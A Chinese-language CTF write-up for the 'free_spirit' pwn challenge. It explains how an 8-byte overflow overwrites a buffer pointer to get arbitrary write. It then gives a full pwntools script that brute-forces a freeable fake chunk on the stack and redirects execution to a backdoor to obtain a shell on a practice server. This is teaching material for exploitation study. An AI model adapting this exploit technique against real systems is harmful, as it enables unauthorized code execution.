free_spirit（在棧上爆破一個可以被free的fake_chunk）

原創

2020-07-05 02:32

free_spirit（在棧上爆破一個可以被free的fake_chunk）

首先檢查一下程序的保護機制

然後，我們用IDA分析一下，功能3存在8字節溢出，將會把v7下面的buf指針覆蓋掉，而覆蓋了buf指針，就能實現任意地址寫。

那麼，我們劫持函數棧返回地址爲one_gadget即可，爲了繞過結尾對buf的檢查，我們的buf非0，且free後不會報錯。

但是我們泄露不了堆地址，因此，只能在棧上找一個合適的fake_chunk，因此，可以直接在棧上爆破，直到程序不崩潰，那麼就可以執行one_gadget了。

#coding:utf8
from pwn import *

backdoor = 0x0000000000400A3E

i = -54
while True:
   try:
      #sh = process('./free_spirit')
      sh = remote('node3.buuoj.cn',29949)
      i -= 1
      sh.sendlineafter('>','2')
      sh.recvuntil('0x')
      stack_addr = int(sh.recvuntil('\n',drop = True),16)
      print 'stack_addr=',hex(stack_addr)

      sh.sendlineafter('>','1')
      sleep(0.5)
      sh.send('a'*0x8 + p64(stack_addr + 0x58) + '\x00'*0x10)
      sleep(0.5)
      #8字節溢出，覆蓋buf指針，造成任意地址寫
      sh.sendlineafter('>','3')

      sh.sendlineafter('>','1')
      sh.sendline(p64(backdoor) + p64(stack_addr + i * 8))

      #8字節溢出，覆蓋buf指針，使得free不報錯
      sh.sendlineafter('>','3')
      #raw_input()
      sh.sendlineafter('>','0')

      sh.interactive()

   except:
      print 'trying...'
      sh.close()

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

相關文章

K8s 安全指南

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-12-17 17:58:58

中國卓越技術團隊訪談錄（2021年第六季）

封面故事：《從零到一，京東物流全量上雲實錄》上雲不是將物理機搬到雲上，而是將整個系統和應用打造成適合雲的狀態，這樣才能從上雲中獲得最大的效益。“如果企業有能力、有資源，上雲越快越好。” 重磅訪談：《從混合包開發到100%純鴻蒙應

InfoQ 中文站

2021-12-15 08:03:56

廣發證券攜手HarmonyOS打造智慧金融服務｜HDC2021技術分論壇

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

HarmonyOS开发者社区

2021-12-14 13:34:05

被美國列入投資黑名單，商湯科技緊急迴應；傳19家互聯網大廠裁員；Log4j 爆“核彈級”漏洞，波及Flink等十餘個項目 | AI一週資訊

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"blockq

2021-12-12 13:38:54

突發！Log4j 爆“核彈級”漏洞，Flink、Kafka等至少十多個項目受影響

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-12-10 14:08:51

蘋果研究人員提出集成反演技術，可從不同機器學習模型中重建訓練數據

{"type":"doc","content":[{"type":"heading","attrs":{"align":null,"level":2},"content":[{"type":"text","text":"MI攻擊"}]},{

2021-12-07 10:28:54

2021 專業人士 Linux 系統 TOP 5

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-12-06 10:13:57

請不起日薪2萬+的網絡安全人才，就做不好數字化轉型嗎？

{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null

2021-12-02 14:13:53

架構師們，請收好這份多雲架構指南

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-11-30 15:18:57

雲計算成 2022 年最重要技術之一

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-11-29 16:13:59

騰訊朱雀實驗室推出Deep Puzzling，利用AI技術進行代碼防護

{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null

2021-11-29 16:13:59

低代碼開發會帶來安全問題和數據泄露隱患嗎？

{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null

2021-11-24 10:03:54

WhatsApp是如何實現端到端加密備份的？

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

Slavik Krassovsky

2021-11-19 09:58:52

騰訊朱雀實驗室推出“隱形”水印，助力打擊AI模型盜取行爲

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-11-12 16:13:56

配置不當的 Docker 服務器已成爲TeamTNT的熱門攻擊目標

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-11-11 09:08:47

24小時熱門文章

最新文章

最新評論文章